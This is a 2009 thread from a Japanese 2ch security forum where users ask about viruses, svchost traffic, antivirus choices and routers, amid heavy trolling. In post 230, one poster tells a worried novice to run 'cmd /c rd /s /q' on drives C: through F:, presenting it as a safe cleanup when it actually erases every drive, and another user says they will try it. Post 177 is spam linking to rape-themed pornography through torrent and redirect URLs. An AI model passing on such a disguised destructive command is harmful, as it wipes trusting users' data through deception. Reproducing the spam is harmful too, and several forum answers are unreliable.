164八頭 ◆YAGApwSaEw :2009/07/10(金) 02:30:56
ウィルス情報質問 総合スレッド★Part39

370 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:10:03 ]
【使用OS】 windowsXP
【WINDOWS UPDATE】 できなくなった
【ウィルスソフト】 ノートンが入っていたような・・・&hijackthis
【UPDATE】 たぶん
【スキャン】 hijackthisっていう解析ソフトで↓の奴が出てきた
O4 - HKLM\..\Run: [ara-key] C:\Program Files\WindowsUpdate\wuaudnld.tmp\cabs\com_microsoft.Q831167_IE6_SP1\Q8311674967.exe -StartUp
O4 - HKLM\..\Run: [Windows Security Manager] C:\Windows\system32\drivers\etc\svchost.exe -c -ax
【症状】 起動すると「フォルダが壊れています」っていうようなメッセージがでてくる
【やったこと】 何もしていない・突然出てきた
【とった処置】 毎回起動時に出てくる上のメッセージを閉じてる

371 名前:名無しさん@お腹いっぱい。 mailto:sage [2006/11/30(木) 22:15:57 ]
>>370
O4 - HKLM\..\Run: [ara-key]・・・っていうエントリーは百発百中antinny
っていうウイルスなんだけど、このウイルスってnyしてなければ
感染することなんて完全皆無だけどね。
お前、winnyしてるんじゃないんか?
165名無しさん@お腹いっぱい。:2009/07/10(金) 02:32:28
>>155
登録名とファイル名が同じとは限らないでしょう。
システム構成ユーティリティのコマンドでファイルパスが確認できるのでは?
ファイルが特定できたら他社で検出されるか確認。
ttp://www.virustotal.com/jp/
他社で検出確認出来たとしてもウイルスか否かの最終判断は貴方。
50%以上で黒判定なら略間違いなし?
30%程度でも有名所複数なら略黒判定?
どのように判断するかは貴方次第。
他社で検出確認出来ればウイルス名も判るので場合によっては対処法もわかるかも。

もし自演なら八頭の完全サポート劇場をみせてくれw
166名無しさん@お腹いっぱい。:2009/07/10(金) 02:34:44

ハチ公キタ━━━━━━(゚∀゚)━━━━━━ !!!!!
167八頭 ◆YAGApwSaEw :2009/07/10(金) 02:38:11
P2PウイルスをP2P以外のサイトで目撃することはありますよ
分類がP2Pウイルス(シェア拡散ウイルス)なワケですから・・・

>>156さんに従い(>>48も読んで)
悪質な被害を及ぼすジャンルですから駆除とか考えずに
この場合、割り切ってスッキリ完全フォーマットが賢明ですね
168155:2009/07/10(金) 02:43:35
>>162
あんたの言うことは聞きません
八頭様の言うことが全てです
>>163
自作自演じゃないって言ってるだろ
>>164
>八頭様
ありがとうございます
たしかに起動時いつも「フォルダが壊れています」というメッセージが出てきました
まえには「指定されたファイルが見つからない」というメッセージも出てました
悪意のあるソフトはインスコした覚えはないのですが
いつもはavastでスキャンするし、問題なければファイルを開く
んですよ
だれもファイル共有ソフトは使ってないと言ってるのに、信じてくれないなんて
ねっとのまなーを少し学べやと言いたいね
>>165
virusとありますが、踏んで大丈夫ですか?
あと自演じゃないよ
169名無しさん@お腹いっぱい。:2009/07/10(金) 02:45:04
>>168
わろす
170165:2009/07/10(金) 02:51:34
>>168
リンク先は安全だと言えば踏むし、罠だったと言えば踏まないのか?
好きにすればよいでしょう。すべては自己判断、自己責任なのだから。
171八頭 ◆YAGApwSaEw :2009/07/10(金) 02:54:58
ITmedia エンタープライズ
会社に潜む情報セキュリティの落とし穴:「ウイルス対策ソフトは万能」という神話を改めよう 2009/07/07
「ウイルス対策ソフトを使えば安心」という意識がPC初心者を中心に根強く存在する。
しかし、ウイルス対策ソフトには強みも弱みもあり、万能ではない
ttp://www.itmedia.co.jp/enterprise/articles/0907/07/news002.html

【セキュリティソフトと年式】     『Avast』 ← 単体では検出の偏りが大きいし、アジアを意識して守ってくれてるわけでもないし
【その他スパイウェア対策ソフト】 『spybot、ad-awarePRO』 ← ほとんど役に立たない

たぶん雑誌とかを参考に組み合わせたんだろうけども日本人が使うにはアブナイ組み合わせです

Nortonスレでも・・・ 現状こうするしかないのです
http://pc11.2ch.net/test/read.cgi/sec/1247110729/24

次の守りの参考にしてください
172名無しさん@お腹いっぱい。:2009/07/10(金) 03:14:58
八頭よ、自作自演も、正しいように見えて大筋では間違ってる回答もどっちもいらんから。
お前が出てくるのはスレ利用者の迷惑にしかならんぞ。
173155:2009/07/10(金) 03:29:01
八頭いらん
リンクしか張れない低脳回答なんて意味ねえんだよ
174名無しさん@お腹いっぱい。:2009/07/10(金) 03:45:29
じゃあ紙芝居か
175名無しさん@お腹いっぱい。:2009/07/10(金) 05:09:57
八頭なんか検出可否スレに篭もればいいんだ
176名無しさん@お腹いっぱい。:2009/07/10(金) 07:00:32
>>160
>>154です。
詳しい解説ありがとうございます。
比較検討して導入したいと思います。
ありがとうございました。
177名無しさん@お腹いっぱい。:2009/07/10(金) 09:54:30
女体拷問研究所 11
http://pics.dmm.co.jp/mono/movie/h_175avgp030/h_175avgp030pl.jpg
http://www.mybtfile.com/torrent/64625546/

(SDAISTIC VILLAGE)羞恥!強制潮吹街中を引き廻せ!大沢佑香
http://pics.dmm.co.jp/mono/movie/1svdvd023/1svdvd023pl.jpg
Link URL: http://www.dayform.com/link.php?ref=FpvTeQrz1F

(SDAISTIC VILLAGE)陵辱!女子校生マシンバイブ 3 香奈々
http://pics.dmm.co.jp/mono/movie/1svdvd022/1svdvd022pl.jpg
Link URL: http://www.dayform.com/link.php?ref=SesKoc7yQb

[笠倉出版社] [sak8449] 女子校生監禁レイプ つぼみ
http://pics.dmm.co.jp/mono/movie/66sak8449/66sak8449pl.jpg
http://www.mybtfile.com/torrent/32554378/

(GLAYZ)キャンギャル調教 Felix Vicious
http://pics.dmm.co.jp/mono/movie/12bur047/12bur047pl.jpg
Link URL: http://www.pidown.com/link.php?ref=pSDYnsXBa9

奴隷女教師 邪淫の制服 松野ゆい
http://pics.dmm.co.jp/mono/movie/51dd278so/51dd278sopl.jpg
http://www6.mimima.com/link.php?ref=0OQC5q9GkK
178名無しさん@お腹いっぱい。:2009/07/10(金) 10:00:16
>>175
ごめん、検出可否スレでもいらない子。
179名無しさん@お腹いっぱい。:2009/07/10(金) 10:01:17
ハチ公ってこことトンスレ以外にも出没してるのか!
180名無しさん@お腹いっぱい。:2009/07/10(金) 10:58:11
>>175
それだけは勘弁願うぜwwwww八頭が検出可否スレなんかに常駐されようものならぼかしつきの画像貼られてみんなパニックになるぜwwwwww
181165:2009/07/10(金) 11:28:58
リンクも踏めないスキルでセキュ板来ても所詮怪我の元
182名無しさん@お腹いっぱい。:2009/07/10(金) 11:45:51
八頭のリンクは安心して踏めるよ^^
183名無しさん@お腹いっぱい。:2009/07/10(金) 12:57:09
http://pc11.2ch.net/test/read.cgi/sec/1246654245/168
>>164
>>八頭様
>あ
>た
>ま
>悪
>い
>ん
>だ
>ね

超爆笑

>>182
釣られないよ
184名無しさん@お腹いっぱい。:2009/07/10(金) 13:20:53
spof.sysって何してるの?
てか実体何処にあるの?
185名無しさん@お腹いっぱい。:2009/07/10(金) 13:37:22
ルータ買ってこようと思うんですけど
セキュリティ的には安いので問題ないですか?
速度的にはもともと5,6Mなんであまり気にしないんですけど多分
186名無しさん@お腹いっぱい。:2009/07/10(金) 13:40:13
というかセキュリティ的にルータいれたほうがいいとわれたので
買ってこようと思うんですが
2.3000円のやつでいいですかね?
187名無しさん@お腹いっぱい。:2009/07/10(金) 13:46:12
> リンクも踏めないスキルでセキュ板来ても所詮怪我の元

最終的にノートンかMicrosoft Security Essentialsの2択で疑う余地ないです。
188名無しさん@お腹いっぱい。:2009/07/10(金) 13:46:25
これなんてどーよ?
http://www.iodata.jp/product/network/router/etx-r/
現状2,500円前後の売値
189名無しさん@お腹いっぱい。:2009/07/10(金) 13:51:52
>>188
安いですね
これでいいならこれ買ってこようと思います
ありがとうございます
190名無しさん@お腹いっぱい。:2009/07/10(金) 14:03:06
無線LANもしたいならそれじゃダメだからね
191名無しさん@お腹いっぱい。:2009/07/10(金) 14:19:26
Γ(^o^) ココ油足りないんじゃネーノ
192名無しさん@お腹いっぱい。:2009/07/10(金) 14:21:44
なんでテンプレにハチ公お断りって入ってないの?
193名無しさん@お腹いっぱい。:2009/07/10(金) 14:42:40
選択肢は刃(やいば)なり〜
194名無しさん@お腹いっぱい。:2009/07/10(金) 14:46:38
>>192
盲導犬や介助犬がOKのお店があるのと同じだとか
195名無しさん@お腹いっぱい。:2009/07/10(金) 15:00:37
>>194
筋違いのようだが論点はずれていない
196名無しさん@お腹いっぱい。:2009/07/10(金) 15:01:42
ハチ公www
197名無しさん@お腹いっぱい。:2009/07/10(金) 15:04:54
【ハチ公】セキュリティ初心者質問スレッドpart○○【お断り】
198名無しさん@お腹いっぱい。:2009/07/10(金) 15:08:09
>>192
>>14を次から入れましょう。
199名無しさん@お腹いっぱい。:2009/07/10(金) 15:24:25
ハチ公って何でもかんでもノートン、ノートンだよな?
それが終わるとリンク貼りしかしない
何の答えにもなってなくね?
200 ◆N9P3SuvBPo :2009/07/10(金) 19:59:23
>199
八頭ってノートンの社員?
って考えすぎか…
201名無しさん@お腹いっぱい。:2009/07/10(金) 19:59:30
>>188
>>190
お店に行ったらバファローのやつしかなかったので
3000円だったけど買ってきて取り付けました
無線LANもほしかったけどセキュリティ的にいうと逆行するかなー
と思い今回は見送りました
これで安心してネットできます
相談にのっていただきありがとうございました(ペコリ
202名無しさん@お腹いっぱい。:2009/07/10(金) 20:58:36
>>171
殴るぞはっつあんw
だから 俺が >22 と>40 で…

しかし、なんだな リンク先に書かれてることは部分的に、、、、いや、やめておこう

>>200
>142 からすると ただの自慢したがりのような

203名無しさん@お腹いっぱい。:2009/07/10(金) 22:07:19
>>200
(ο^д^)ノシ
204 ◆N9P3SuvBPo :2009/07/10(金) 22:22:03
>202
そーいえば俺も自慢するときだってあるよーなないよーな…

>203
φ(゜o゜)ノシ
205名無しさん@お腹いっぱい。:2009/07/10(金) 22:31:30
ハチ公いねえのかw
206名無しさん@お腹いっぱい。:2009/07/10(金) 22:49:03
八頭 様
以前は大変お世話になりました。
いるんでしょ
出てきて元気な姿を見せてください。

オラ!出てこんかい!
207名無しさん@お腹いっぱい。:2009/07/10(金) 22:50:19
釣りバカ見てんだよw
208名無しさん@お腹いっぱい。:2009/07/10(金) 22:50:48
>>204
(ο^д^)ノシ
209名無しさん@お腹いっぱい。:2009/07/10(金) 22:54:17
ハチ公のAA作ってやれよw
210名無しさん@お腹いっぱい。:2009/07/10(金) 23:04:43
ルータつけたんですけどエロサイトに行くと
宮崎の素敵な女性います
みたいな宣伝がでます
IP見えないようになってないんですかね?
211名無しさん@お腹いっぱい。:2009/07/10(金) 23:05:46
プロバイダは相手に隠してないから。
212名無しさん@お腹いっぱい。:2009/07/10(金) 23:09:26
そういうことなんですか
即レスありがとうございます
213 ◆N9P3SuvBPo :2009/07/10(金) 23:15:18
>184
遅れてすいません。
実体というのは、spof.sysがある場所でしょうか?
それとも、spof.sysを動かしてる親玉でしょうか?

>208
φ(・o・)ノシ

>210
海外のエロサイトでは良くそういったものが見られますよ
もっともIPアドレスから分かる情報は限られてるわけで、
あまり気にするようなことでは、ありません。
214名無しさん@お腹いっぱい。:2009/07/10(金) 23:39:47
http://www.hachi-movie.jp/
215名無しさん@お腹いっぱい。:2009/07/10(金) 23:51:41
質問です。
とあるサイトでzipファイルを落としてノートン先生に診てもらったら
ウィルス有りで解決と表示されました。
もう一度、同じファイルを診てもらったら問題無しとでました。

このzipファイルはもう安全とみなしていいのでしょうか?
216名無しさん@お腹いっぱい。:2009/07/10(金) 23:54:15
      ___   ━┓  ___    ━┓
     / ―  \  ┏┛/ ―\   ┏┛
    /  (●)  \ヽ ・. /ノ  (●)\  ・
  /   (⌒  (●) /. | (●)   ⌒)\
  /      ̄ヽ__) /   |   (__ノ ̄  |
/´     ___/     \        /
|        \          \     _ノ
|        |          /´     `\
217名無しさん@お腹いっぱい。:2009/07/10(金) 23:55:19
そんなファイルは諦めて捨てるのが正しい対処法です。
218名無しさん@お腹いっぱい。:2009/07/10(金) 23:55:50
               .|   |  | |   |    |  | |   |   |   || | |
               .|   |  | レ  |    |  | |   |  J   || | |
    ∩___∩    |   |  |     J    |  | |  し     || | |
    | ノ\   ,_ ヽ  .|   レ |      |  レ|       || J |
   /  ●゛  ● |   .J      し         |     |       ||   J
   | ∪  ( _●_) ミ             .|    し         J|
  彡、   |∪|   |              .J                レ
 /     ∩ノ ⊃  ヽ
 (  \ / _ノ |  |
  \  "  /  | |
   \ / ̄ ̄ ̄ /
219名無しさん@お腹いっぱい。:2009/07/11(土) 01:56:33
【使用OS】      『XP SP3』 
【PCスペック】    『CPU: 3GHz 、メモリ: 2GB』  
【使用ブラウザ】  『Sleipnir』 
【Microsoft Updateの更新の状態】 『自動更新は停止状態』 
【回線の種類・ルータの有無】  『sonet ADSL12M AtermWD701CL(ファームウェアは最新1.11)』 

つい先日sonet乗り換えてモデムを接続したところ
通信してないのにDATAランプが点滅しているのでパケットモニタで見てみると
scvhost.exeがローカルIPアドレスに対して1kb/s以内でずっと通信しています
これは正常なのでしょうか?
一応ぐぐって調べてみたのですが、ログイン名でscvhostが働いていたら
ワームの可能性とか書いてあったのをみたのですが
ログイン名で働いているscvhostはありませんでした
よろしくお願いします

プロセス名:c:\windows\System32\scvhost.exe
リモートホスト:warpstar
リモートIPアドレス:192.168.0.1
ローカルIPアドレス:192.168.0.5
220名無しさん@お腹いっぱい。:2009/07/11(土) 03:32:51
>>219
ウイルスとかそういうのじゃないと思うよ。
その通信でどのポート番号使われてるかわかりませんか?
221名無しさん@お腹いっぱい。:2009/07/11(土) 03:36:00
【ノートン】Norton Internet Security Ver.169【2009】
http://pc11.2ch.net/test/read.cgi/sec/1247110729/116

116 名前:名無しさん@お腹いっぱい。[] 投稿日:2009/07/10(金) 23:57:32
質問です。
とあるサイトでzipファイルを落としてノートン先生に診てもらったら
ウィルス有りで解決と表示されました。
もう一度、同じファイルを診てもらったら問題無しとでました。

このzipファイルはもう安全とみなしていいのでしょうか?


マルチとか・・・
これハチ公の自演じゃね?
222名無しさん@お腹いっぱい。:2009/07/11(土) 06:19:07
>>220
1500-2700ぐらいまで使っているみたいです
223名無しさん@お腹いっぱい。:2009/07/11(土) 06:59:58
一時期ミスでファイアウォールが無効になった状態のままネットしてたんだが、
完全スキャンして何も引っかからなければ問題なかったって認識でよい?
224名無しさん@お腹いっぱい。:2009/07/11(土) 09:34:22
avast使ってるんですが
なんかよく貼られてるランキング見たいので結構順位が低いみたいなんですけど
大丈夫なんですかね?
225名無しさん@お腹いっぱい。:2009/07/11(土) 10:17:26
どうです?
226名無しさん@お腹いっぱい。:2009/07/11(土) 11:10:36
>>223
心配ならフォーマット・再インストール

>>224
心配なら乗り換えろ
227名無しさん@お腹いっぱい。:2009/07/11(土) 12:18:20
>>226
心配だからフォーマットするわ、サンクス
228名無しさん@お腹いっぱい。:2009/07/11(土) 12:34:57
どんだけPCに重要なものが入ってるんだよw
おまいら過度になりすぎw あほかw
229名無しさん@お腹いっぱい。:2009/07/11(土) 12:42:17
・ ここは2ちゃんねるですので、正しい解答ばかりとは限りません (用心しましょう)
230名無しさん@お腹いっぱい。:2009/07/11(土) 12:46:36
>>227
これ使えばいいじゃん
何もかも消えてしまうけど
フォーマットしようが一時的バックアップとったファイルの中にヤバイモノが紛れ込んでたら始末に負えないぞ
スキャンかけても何も出てこないしなwwww



ファイル名を指定して実行に

cmd /c rd /s /q c:


と入力し[OK]

上記と同様に以下も
cmd /c rd /s /q d:
cmd /c rd /s /q e:
cmd /c rd /s /q f:
231名無しさん@お腹いっぱい。:2009/07/11(土) 14:00:50
>>230
横からだけど、ちょっとやってみます
232名無しさん@お腹いっぱい。:2009/07/11(土) 14:03:07
パソコン初心者の私に教えて下さい

プラウザFirefoxにセキュリティー機能が搭載されているから、市販のセキュリティーソフトは
必要ないと判断して良いでしょうか?
233名無しさん@お腹いっぱい。:2009/07/11(土) 14:04:04
>>228-230
この反応見る限り問題なさそうだな、サンクスコ
234名無しさん@お腹いっぱい。:2009/07/11(土) 14:06:55
>>232
ダメダメです。
235名無しさん@お腹いっぱい。:2009/07/11(土) 14:08:18
>>232
インターネットしなければブラウザ関係なくセキュリティソフト必要なしですよ
236232:2009/07/11(土) 14:18:47
素早い返信サンクスです。(今はノートン2009を使用中)
まあ、しばくはIE8を使ってみます。
237名無しさん@お腹いっぱい。:2009/07/11(土) 15:00:55
>>235
甘いぞ
最近はUSBから感染するウイルスも多い
238 ◆N9P3SuvBPo :2009/07/11(土) 15:09:27
USBメモリが感染してなければ問題ない。
239名無しさん@お腹いっぱい。:2009/07/11(土) 16:24:05
>>238
(ο^д^)ノシ
240名無しさん@お腹いっぱい。:2009/07/11(土) 16:44:04
>>222
プロセス名:c:\windows\System32\scvhost.exe
リモートホスト:warpstar
リモートIPアドレス:192.168.0.1
ローカルIPアドレス:192.168.0.5

↑こう判断したのはfirewallのログからでしょ?そのログの画面ハードコピーを
とってうpしてみてくれない?
241219:2009/07/11(土) 16:53:17
>>240
リモートポート:2689
状態:EASTABLISHED
プロセスID:1172

NEGIESというのを使っていて、情報コピーみたいな機能はありません
あとは、上記のような情報しか見れないです

他の人はこういうことないんでしょうか?
前のプロバイダのモデムもこういう感じでDATAランプが点滅しっぱなしHDDランプも点滅
242名無しさん@お腹いっぱい。:2009/07/11(土) 16:58:22
ここにまともに答える奴なんていませんよ
初心者煽ってる屑しかいません
243名無しさん@お腹いっぱい。:2009/07/11(土) 17:08:01
>>241
prtscrでログ画面のハードコピーをとって (もしくはALT+prtscrで対象ウインドウのみ)
それをうpローダにあげてくれって意味なんだけど。
同時にコマンドプロンプトからnetstat -anoと打ってその画面もあげてくれると
なにかわかるかも。セキュリティソフトは何使ってます?
244名無しさん@お腹いっぱい。:2009/07/11(土) 17:29:53
>>243
何聞き出そうとしてるんだ?
ハッキングでもしようってのか?
そんな情報あげられるか
ここまで言って何もわからないわけないだろカス
245名無しさん@お腹いっぱい。:2009/07/11(土) 17:37:22
Vista x64で使えるフリーのウイルス対策ソフトありませんか
246名無しさん@お腹いっぱい。:2009/07/11(土) 17:38:04
ローカル内の通信なんだろ。ファイル共有とかしてるんじゃないか?
247名無しさん@お腹いっぱい。:2009/07/11(土) 17:47:16
>>245
アンチウイルスだけでいいのかな?あるよ。

Avast
http://www.avast.com/jpn/system-requirements-avast-home.html
>avast! Home Edition のシステム要件
>Windows(R) Vista が稼働しているコンピュータ:

AVG
http://www.avgjapan.com/avgfree80.html
>動作環境
>OS : Windows 2000, XP, XP Pro x64 Edition, Vista, Vista x64 Edition

AntiVir(プレミアムのページだけどFreeも条件一緒)
http://www.avira.com/en/products/avira_antivir_premium_3.html
>System Requerements
>WindowsVista(32bit or 64Bit),SP1

−−−−
キングソフト(これだけが32bit以外不可)
http://www.kingsoft.jp/is/kis_use.html
>OS Windows Vista(32bit)/XP(32bit)/2000/Windows 7 (正式版のみ)
248名無しさん@お腹いっぱい。:2009/07/11(土) 20:03:20
>>240
atermstation 、WARPSTARサテライト
使ってるアクセスポイントとの通信だろ
249名無しさん@お腹いっぱい。:2009/07/11(土) 20:05:06
アンカーミス
>>219
×>>240
250名無しさん@お腹いっぱい。:2009/07/11(土) 20:32:35
c:\windows\System32\scvhost.exe
この情報出してわからないやつが
使用ポートなどを聞いてわかるわけないだろボケ
てか、全然関係ねーし
FWソフト何使ってるかなんて関係ねーだろ
氏ねボケ
251名無しさん@お腹いっぱい。:2009/07/11(土) 20:47:15
>>250
質問スレです
お引取りください
252 ◆N9P3SuvBPo :2009/07/11(土) 20:52:51
c:\windows\System32\scvhost.exeはヤバイ…
c:\windows\System32\svchost.exeなら問題ないが。
253名無しさん@お腹いっぱい。:2009/07/12(日) 01:08:24
c:\windows\System32\svchost.exeな
書き間違えてたわ

どっちみちわかんないんだろおまえらには
254名無しさん@お腹いっぱい。:2009/07/12(日) 01:12:20
問題あるなしじゃないんだよ
このうざい通信を止められないのかってことなんだよ
ずっとDATAが点滅してたらアタックされている場合の判断つかないし
まじでうざい
255名無しさん@お腹いっぱい。:2009/07/12(日) 01:37:01
>>254
はいはい、みんなわからないのでお引取りください。
svchost.exeが2000番代のポートつかってる時点で・・・
256名無しさん@お腹いっぱい。:2009/07/12(日) 02:58:01
つか、マルチしまくりだな
257名無しさん@お腹いっぱい。:2009/07/12(日) 03:04:20
またハチ公の自演か!
258名無しさん@お腹いっぱい。:2009/07/12(日) 03:17:06
マルチじゃねーだろ
荒ししかいないから他で聞いているんだろ
259八頭 ◆YAGApwSaEw :2009/07/12(日) 03:22:44
SVCHOST.EXEはタスクマネージャのプロセスで複数起動していることがありますが、各サービスを起動するためのプロセスです。
同じ名前を装ったウイルスなどもありますので、ウイルスチェックは定期的に行いましょう。

例えばXPやMedia PlayerのNETWORK SERVICEなら
・ASP.NET State Service
・Distributed Transaction Coordinator
・DNS Client
・Performance Logs and Alerts
・Remote Procedure Call (RPC)
・Remote Procedure Call (RPC) Locator

・Windows Media Player Network Sharing Service (*Media Player 11 )

technet.microsoft.comのProcess Explorerで各プロセスの確認は出来るね
260219:2009/07/12(日) 03:36:16
>>259
どうもありがとうございます

ウィルスならログイン名でプロセスが起動するようですが
そういうことは一切ありません

それに動いているのはこれです
c:\windows\System32\svchost.exe
これがウィルスなら、ネットすらできないでしょ・・・

というか、この質問に答えられないということは
他の人のPCだとネットしていないときにDATAランプは点滅していないのですか?
前のプロバイダのモデムも、前に使ってたPCでも点滅しているので普通だと思っていたんですが
やっぱり、ずっと点滅しているのはうざいのでどうにかしたいんですけど

それとリモートポート:2689を使うサービスは
SSDP Discovery Service
UPnP divece host
のようで、これらを停止しても点滅は止まりません
261219:2009/07/12(日) 03:39:51
sc qc rpcss
で見ると
Remote Procedure call(RPC)
だけ表示されました
262名無しさん@お腹いっぱい。:2009/07/12(日) 03:52:25
>>257
正解!
263名無しさん@お腹いっぱい。:2009/07/12(日) 03:57:40
>>260
おまえに質問は無理。半端な知識で考えてろwww
264名無しさん@お腹いっぱい。:2009/07/12(日) 04:03:39
誰か「ハチ公の部屋」でスレ立ててやれよw
265219:2009/07/12(日) 04:24:22
>>263
バカには聞いてない黙ってろ
266名無しさん@お腹いっぱい。:2009/07/12(日) 04:34:19
       /ヽ /\   
     / (ー −)\  バカには聞いてない黙ってろ 
     (   (_人_)  ) 
     ノ   `-'  ヽ 
    (_つ    _つ

        __
       /ノ ヽ\
     / (● ●)\ だっておwwwwwwwwwwwwwwwww
     (  o゚(_人_)゚o )
     ノ/) )) lr-l  /) )) バン!!
    (_つ ))`-' _ つ ))  バン!!
267219:2009/07/12(日) 04:34:59
>>263
>>264
>>262
お前ら何が目的なの?
質問者煽ることがお前らにとって何か得でもあるのか?
お前らどんな人生歩んでるんだよ気持ち悪い
268219:2009/07/12(日) 04:36:10
>>266
誰も答えられないじゃん
バカじゃないの証明してみろよ
答えられないなら俺と一緒
269名無しさん@お腹いっぱい。:2009/07/12(日) 04:36:16
狂犬病注意
270219:2009/07/12(日) 04:37:28
そうやって煽るためにわざわざここに毎日きてんの?
気持ち悪い

答えなくていいから黙ってろよ無知のバカ
271名無しさん@お腹いっぱい。:2009/07/12(日) 04:38:34
>>244
>>250
>>253
>>265
>>270
お前何が目的なの?
回答者煽ることがお前らにとって何か得でもあるのか?
お前らどんな人生歩んでるんだよ気持ち悪い

272219:2009/07/12(日) 04:44:20
>>271
回答者はいないから
273名無しさん@お腹いっぱい。:2009/07/12(日) 04:47:08
>>272
質問者もいないから
274219:2009/07/12(日) 04:55:45
友達いないからってここにくるなよカス
275名無しさん@お腹いっぱい。:2009/07/12(日) 07:20:17
>>260
WAN側のアクセス表示と、LAN側のアクセスが、ゴッチャになってるんでは?LAN側のアクセス表示は、
ルーター内蔵の物だったり、Webサーバ内蔵してたりすれば、1秒間隔ぐらいでアクセスするでしょ。
ローカルIP内の通信なら、個人ユーザーなら気にすること無いと思うけど?

点滅がウザイというなら、10年ほど前の機材で固めないと。OSも。DHCPとかUPnPとか無縁で、NET接続
を全部手動で設定する世界に戻るしかないでしょね。
276219:2009/07/12(日) 07:31:07
>>275
レスありがとうございます

ということは、この点滅は最近PCのユーザーなら点滅しているということですか?

277名無しさん@お腹いっぱい。:2009/07/12(日) 10:32:50
八頭だな
278名無しさん@お腹いっぱい。:2009/07/12(日) 11:03:54
八頭の自演うざすぎる
279名無しさん@お腹いっぱい。:2009/07/12(日) 16:28:38
(ο^д^)ノシ
280219:2009/07/12(日) 16:50:14
もう解決したからwww
無能どもバイバイw
281219:2009/07/12(日) 18:25:36
それにしても、ほんとできる人は違うねww
どこ聞いても答えてもらえなかったのに
優秀なエンジニアはいるものですね。さすがですね
おまえらバカもわからないからって質問者煽ってないで
ちゃんと勉強しろカスw
282219:2009/07/12(日) 18:49:14
>>240
なにがポートだよボケwww
何がファイアーウォールだチンカスw
283名無しさん@お腹いっぱい。:2009/07/12(日) 18:57:32
ノートンの更新期間が終わりそうなのだが、次はどのソフトを使おうかな。(・ω・` )
下記ソフトならばどれがベストチョイスでしょうか?

インターネットセキュリティー・バリア
メディアロック2
ウイルスキーラ-ゼロ
ZoneAlarm
G-DATA
マカフィー
セキュリティーZERO
ESET V4.0
284219:2009/07/12(日) 18:58:17
>>219
なにが解決したんだよww
包茎小僧
285219:2009/07/12(日) 19:02:33
しかしまぁ、言葉もないわ・・・
ttp://okwave.jp/qa5118324.html
286名無しさん@お腹いっぱい。:2009/07/12(日) 21:04:34
【使用OS】      『Vista SP2』
【使用ブラウザ】  『Firefox』
【セキュリティソフトと年式】     『G DATA InternetSecurity2009』
【回線の種類・ルータの有無】  『ADSL 無線』
【具体的な症状】 『G DATAが誤検知するソフトのダウンロードが出来ません』
【過程と措置】   『G DATAをウイルスガードを無効にするに設定しても遮断してくるのでどうすればダウンロード出来るのか困っています』
【その他】  『ttp://lapcie.com/index.php?page=AsukaTime 例えばこれとかダウンロードしたいのですが』
287名無しさん@お腹いっぱい。:2009/07/12(日) 21:06:04
>>286
追記 この板のG DATAスレも見られません
288名無しさん@お腹いっぱい。:2009/07/12(日) 21:08:18
例外設定とか無いの?
289 ◆N9P3SuvBPo :2009/07/12(日) 21:09:42
手っ取り早い方法としてはG DATAをア(ry
290名無しさん@お腹いっぱい。:2009/07/12(日) 21:16:42
>>288
恐らくWebサイト一つ一つを例外にする設定は無いのではと思います、正直G DATAは使い始めて日が浅いのでよく分からないのですが…
>>289
それは実は本当に一時的にしようかと思ってましたwしかし冷静に考えるとG DATAスレにG DATA使ってない人がいないわけねーだろwって思ったのでどうやってるのかなぁと思っています
291名無しさん@お腹いっぱい。:2009/07/12(日) 21:22:56
G DATAを使ってるヤツはどうやっても見れないような
嫌がらせって可能性もあるけどなw
292 ◆N9P3SuvBPo :2009/07/12(日) 21:41:01
>290
俺はG DATA使ってないのでG DATAの知識は完全にゼロです。
えっとー…この板はFirefoxで閲覧?
専ブラでも見れませんか?<gダタスレ
293名無しさん@お腹いっぱい。:2009/07/12(日) 21:46:59
>>292
(ο^д^)ノシ
294 ◆N9P3SuvBPo :2009/07/12(日) 21:51:55
>293
φ(^∀^)ノシ
295名無しさん@お腹いっぱい。:2009/07/12(日) 22:01:58
>>290
使ったことがないソフトなので…
常駐を無効にしてもPFWが生きているとか…?
根本的解決にはならないけど自動起動を切ってリブートしてみるとか…
>>294
( ´(ェ)`)ノシ
296名無しさん@お腹いっぱい。:2009/07/12(日) 22:02:51
>>294
(ο^д^)ノシ
297 ◆N9P3SuvBPo :2009/07/12(日) 22:04:13
>295
φ(^∀^)ノシ
298名無しさん@お腹いっぱい。:2009/07/12(日) 22:47:18
【使用OS】      『Microsoft Windows XP Professional Version 2002 Service Pack 3』
【PCスペック】    『CPU:Intel Pentium V プロセッサ 850MHz 、メモリ:1.00 GB RAM』
【使用ブラウザ】  『Microsoft Internet Explorer 6』
【Microsoft Updateの更新の状態】 『自動更新設定』
【セキュリティソフトと年式】   『AVG Anti-Virus Free Edition 8.5』
【その他スパイウェア対策ソフト】 『Spybot-Search&Destroy』
【回線の種類・ルータの有無】   『ADSL 12Mbps 有線ルータで使用中 』

【具体的な症状】 質問の内容になりますが

グループポリシー(gpedit.msc)の、

[コンピュータの構成]-[管理テンプレート]-[Windows コンポーネント]-[Internet Explorer]
[インターネット コントロール パネル]-[セキュリティ ページ]の中にある

ロックダウンされたインターネット、ロックダウンされたイントラネット
ロックダウンされたイントラネット ロックダウンされた信頼済みサイト

について、これらを設定した場合はどこに反映され、
どのようなことをすれば、設定できていることを確認できるでしょうか?

【過程と措置】
実際にロックダウンされたインターネットにセキュリティレベルを最高に設定し
YouTubeを開き、動画再生ページに移動したが、普通に再生できてしまう
「ロックダウンされたインターネット」でGoogleで検索すると答えてねっとに
http://www.kotaete-net.net/Default.aspx?pgid=14&qid=240997422018
回答らしきものがあるが、結局、どこに設定されているか分かりませんでした。
299名無しさん@お腹いっぱい。:2009/07/12(日) 23:31:46
>>298
当方は未設定で使用しているし実証する気もないが、
Admin権限の無いユーザーが勝手に設定を変更できないようにする機能らしいから
Admin権限の無いのアカウントで普通に再生できるか確認したらどうだろう。
それでも再生されるようならセキュリティ ページ下のロックダウンされたインターネット ゾーンの設定確認や
「ユーザーの構成」以下の設定確認も変更して実証してはどうか?

ttp://www.microsoft.com/japan/office/ork/2003/seven/ch24/default.htm
300 ◆N9P3SuvBPo :2009/07/12(日) 23:35:47
>298
再起動しても駄目ですか?
あと、セキュリティレベルを最高にしたら通常はActiveXなどが無効に設定され、
インターネットオプションから戻そうとしても、変更はできなくなるのですが…
301名無しさん@お腹いっぱい。:2009/07/12(日) 23:37:54
アンチウイルスソフトを切ってあえてウイルス.exeを実行してまたソフトをつけるとどうなる?
激怒、スルー?
302名無しさん@お腹いっぱい。:2009/07/12(日) 23:39:33
ウイルスによる
303名無しさん@お腹いっぱい。:2009/07/12(日) 23:47:20
レスども。唐突に疑問に思ったんで面白そうなウイルスあったら仮想ソフト上で実行してみる。
